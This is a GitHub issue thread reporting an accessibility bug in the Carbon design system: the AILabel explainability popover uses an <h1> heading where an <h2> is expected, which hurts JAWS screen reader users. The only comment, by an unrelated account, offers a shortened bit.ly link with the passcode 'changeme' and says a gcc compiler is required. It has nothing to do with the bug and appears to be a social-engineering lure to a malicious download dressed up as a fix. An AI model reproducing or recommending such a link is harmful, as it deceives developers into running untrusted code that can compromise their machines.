### ISSUE TITLE
[a11y] [AILabel] [explainability-popover]:  <H1> used with in the Sub section 

### ISSUE THREAD

**Issue by 2nikhiltom** [carbon-design-system/carbon#17340]
### Package

@carbon/react

### Package version

v1.65.0

### React version

18.02

### Automated testing tool and ruleset

Manual QA

### Assistive technology

JAWS

### Description

The `<h1>` element should be used exclusively for the main(parent) page.
Panel headings should be marked with `<h2> `to ensure a clear and accessible hierarchy.

<img width="1376" alt="image" src="https://github.com/user-attachments/assets/fe6f4281-4b8c-47c8-b935-281c0b8164d1">

If page headings are not in the right sequence, screen reader users find it difficult to comprehend the hierarchical structure of the page content. 

### Reproduction/example

https://react.carbondesignsystem.com/?path=/story/components-ailabel--explainability-popover

### Steps to reproduce

https://react.carbondesignsystem.com/?path=/story/components-ailabel--explainability-popover

### Suggested Severity

Severity 3 = User can complete task, and/or has a workaround within the user experience of a given component.

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems

**Comment by Har33m-Sha1kh** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
